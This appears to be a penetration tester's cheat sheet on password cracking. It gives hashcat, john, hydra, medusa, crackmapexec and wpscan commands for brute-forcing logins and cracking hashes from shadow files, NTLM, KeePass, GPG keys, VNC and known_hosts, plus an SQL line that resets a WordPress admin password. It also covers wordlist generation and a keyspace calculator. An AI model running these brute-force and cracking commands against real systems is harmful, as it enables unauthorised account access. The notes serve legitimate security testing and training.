bkcrack: cracking a password when some of the files are known

Browser password cracking

crackmapexec

  • mass brute forcing
> crackmapexec ldap -u users.txt -p pass.txt -M laps <target-ip>

gpg cracking

  • convert private key to john format
> gpg2john creds.priv
  • crack the private key
> john --wordlist=/usr/share/wordlists/rockyou.txt gpg.john
  • import to keyring
> echo "qwertyuiop" | gpg --batch --yes --allow-secret-key-import --import creds.priv
  • decrypt a gpg-encrypted file (passphrase read from stdin)
> echo "qwertyuiop" | gpg --batch --yes --decrypt --passphrase-fd 0 creds.txt.gpg

hashcat

hashcat64.exe -a 0 -m 18200 hash.txt passwordlist.txt

  • Common use cases
# sha2-256
> hashcat.exe -m 1400 hash.txt rockyou.txt

# shadow
> hashcat.exe -m 1800 -a 0 -o result.txt --remove hash.txt rockyou.txt

# ntlm
> hashcat.exe --force -m 1000 -r rules\best64.rule hash.txt rockyou.txt --outfile alice.recovered

# wordpress
> hashcat.exe -m 400 -a 0 hash.txt rockyou.txt
pass123:$P$BNMdSXZIJVPFih/nCL/Tm6eT152wQv0
> UPDATE `wp_users` SET `user_pass`='$P$BNMdSXZIJVPFih/nCL/Tm6eT152wQv0' WHERE user_login='admin';

# kdb
> keepass2john Database.kdb
> hashcat.exe -a 0 -m 13400 hash.txt rockyou.txt

# apache password
> hashcat.exe -a 0 -m 1600 hash.txt rockyou.txt

# rar5
> hashcat64.exe -a 0 -m 13000 hash.txt rockyou.txt

hydra

  • limit parallel connections (-t)
> hydra -t 4 -l hadi -P passwords-mutated.txt <ip> ssh
  • multiple users, passwords, servers
> hydra -L users.txt -P passwords.txt -M servers.txt smb
  • post form brute force
* F=failed: string searched for in the response that marks a failed login
* S=<code>: match on status code instead

> hydra -l root@localhost -P wordlist.txt <ip> http-post-form "/<path-to-login-form>:<req-params>&User=^USER^&Password=^PASS^:F=failed"

# Wordpress examples
> hydra -l admin -P /usr/share/wordlists/rockyou.txt <ip> http-post-form "/wp-login.php:log=^USER^&pwd=^PASS^&wp-submit=Log+In&testcookie=1:F=incorrect"
> proxychains -q hydra -l admin -P /usr/share/wordlists/SecLists/Passwords/Common-Credentials/best1050.txt <ip> -s 9999 http-post-form "/wp-login.php:log=^USER^&pwd=^PASS^&wp-submit=Log+In&testcookie=1:F=incorrect"

known_hosts cracking

# a hashed known_hosts entry has the format |1|<base64 salt>|<base64 HMAC-SHA1(salt, hostname)>| <key type> <host key>
|1|hl0YV0IGtl8GWLFNcFuR94BrJxc=|/AFIoup5IaWwtDG9RMEvirDFo9c= ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBJEd7x32eXrsJKVS9556PvIIKUYXHKwbyMLGpwNKA6vnIXEgYAW9WRtVh2tRgFB33BCNWj/XoMHmeG7iOTu8Gqs=

# convert to hashcat-compatible format (hex salt:hex hash)
> python3 kh-converter.py known_hosts
fc0148a2ea7921a5b0b431bd44c12f8ab0c5a3d7:865d18574206b65f0658b14d705b91f7806b2717

# crack (mode 160 = HMAC-SHA1 with key = salt) using a mask file of IPv4 address patterns
> hashcat -m 160 --quiet --hex-salt hash.txt -a 3 ipv4_hcmask.txt
fe21773879e65286ef306151251608165c3e22b3:ed9c2eb01d82af664b63caf7c39062ed28d6a1a1:<ip>

medusa

> medusa -h portal.windcorp.htb -u admin -p admin -M web-form -m FORM:"/login" -m DENY-SIGNAL:"Wrong credentials" -m FORM-DATA:"username=&password="

pdf cracking

pdfcrack -f file.pdf -w /usr/share/wordlists/rockyou.txt

virtualbox

vnc cracking

  • dump the obfuscated password from the registry and decode it
> reg export "HKLM\Software\TightVNC\Server" foo.reg
> python vncpasswd.py -d -H 2151d3722874ad0c

wpscan brute-forcing

> wpscan --url http://<ip> -U {user} -P /usr/share/wordlists/SecLists/Passwords/Common-Credentials/10k-most-common.txt

zip files

fcrackzip -D -u -p '/usr/share/wordlists/rockyou.txt' bank-account.zip

Wordlist generation

  • unshadow the passwd
> unshadow passwd shadow
  • cupp: password profiling
> cupp -w mutated.txt
  • crunch: generate passwords with prefix
> crunch 24 24 -t ThisIsTheUsersPassword%% -o passwords.txt
  • cewl: generate a seed wordlist from a website's content (good to use with hydra)
> cewl -w secretsec.txt http://<ip>
  • usernamer: generate usernames, use together with smtp-user-enum.pl and cewl
https://github.com/jseidl/usernamer
  • rsmangler: generate a mangled wordlist from a base list
> rsmangler --file base_wordlist.txt --output mangled.txt
  • hashcat: generate a wordlist from a mask with custom charsets (-1 .. -4, referenced in the mask as ?1 .. ?4)
> hashcat.exe --force --stdout -a 3 -1 ABCD -2 abcd -3 0123 -4 !@# ?1?12?23?123?1234 > wordlist.txt
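An added example (not from these notes) to go with the hashcat mask above: a Python calculator that parses a mask together with the -1 .. -4 custom charsets, counts its keyspace and converts that to worst-case time at an assumed hash rate, which is what you need when judging whether a password policy actually resists a mask attack. It assumes hashcat's built-in ?l ?u ?d ?s ?h ?H ?a sets and treats literal characters as fixed, one option each.

```python
import math
import string

# hashcat built-in charsets; ?a is ?l?u?d?s, the 95 printable ASCII characters
BUILTIN = {
    "l": string.ascii_lowercase,
    "u": string.ascii_uppercase,
    "d": string.digits,
    "s": " " + string.punctuation,
    "h": "0123456789abcdef",
    "H": "0123456789ABCDEF",
}
BUILTIN["a"] = BUILTIN["l"] + BUILTIN["u"] + BUILTIN["d"] + BUILTIN["s"]


def tokens(spec, custom):
    """Yield the raw charset for each position of `spec` (a mask or a -1..-4 definition)."""
    i = 0
    while i < len(spec):
        if spec[i] != "?":
            yield spec[i]  # literal character: exactly one option at this position
            i += 1
            continue
        if i + 1 >= len(spec):
            raise ValueError("dangling '?' at end of mask")
        sel = spec[i + 1]
        if sel == "?":
            yield "?"  # '??' is a literal question mark
        elif sel in BUILTIN:
            yield BUILTIN[sel]
        elif sel in custom:
            # a -1..-4 definition may itself use ?l, ?d, ...; flatten it into one set
            yield "".join(tokens(custom[sel], {}))
        else:
            raise ValueError(f"unknown charset ?{sel}")
        i += 2


def parse_mask(mask, custom=None):
    """One deduplicated charset per password position; `custom` maps '1'..'4' to -1..-4."""
    return ["".join(dict.fromkeys(cs)) for cs in tokens(mask, custom or {})]


def keyspace(mask, custom=None):
    """Number of candidates the mask expands to."""
    return math.prod(len(cs) for cs in parse_mask(mask, custom))


def seconds_to_exhaust(mask, rate, custom=None):
    """Worst-case time to try every candidate at `rate` hashes per second."""
    return keyspace(mask, custom) / rate
```

Run against the mask above (`?1?12?23?123?1234` with -1 ABCD -2 abcd -3 0123 -4 !@#), the digits written directly into the mask are literals, so it expands to only 4^5 = 1024 candidates; a full dotted IPv4 mask such as `?d?d?d.?d?d?d.?d?d?d.?d?d?d` is 10^12.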

Common password lists

/usr/share/wordlists/SecLists/Passwords/Common-Credentials/best1050.txt
dirb/wordlists/common.txt
dict/wordlist-probable.txt
wfuzz/wordlist/general/megabeast.txt
sqlmap/data/txt/smalldict.txt
seclists/Miscellaneous/lang-english.txt
seclists/Miscellaneous/wordlist-skipfish.fuzz.txt
seclists/Discovery/DNS/dns-Jhaddix.txt
seclists/Discovery/Web-Content/common-and-french.txt
seclists/Discovery/Web-Content/big.txt
seclists/Discovery/Web-Content/raft-large-words.txt
seclists/Discovery/Web-Content/common.txt
seclists/Discovery/Web-Content/common-and-italian.txt
seclists/Discovery/Web-Content/common-and-spanish.txt
seclists/Discovery/Web-Content/common-and-portuguese.txt
seclists/Discovery/Web-Content/raft-large-words-lowercase.txt
seclists/Passwords/mssql-passwords-nansh0u-guardicore.txt
seclists/Passwords/bt4-password.txt
seclists/Passwords/Leaked-Databases/phpbb-cleaned-up.txt
seclists/Passwords/Leaked-Databases/phpbb.txt
seclists/Passwords/Software/cain-and-abel.txt
seclists/Passwords/dutch_common_wordlist.txt
seclists/Passwords/openwall.net-all.txt
seclists/Passwords/Honeypot-Captures/multiplesources-passwords-fabian-fingerle.de.txt
seclists/Passwords/darkc0de.txt
seclists/Usernames/xato-net-10-million-usernames.txt
seclists/Usernames/xato-net-10-million-usernames-dup.txt
wordlists/dirb/common.txt
wordlists/wfuzz/general/megabeast.txt
wordlists/rockyou.txt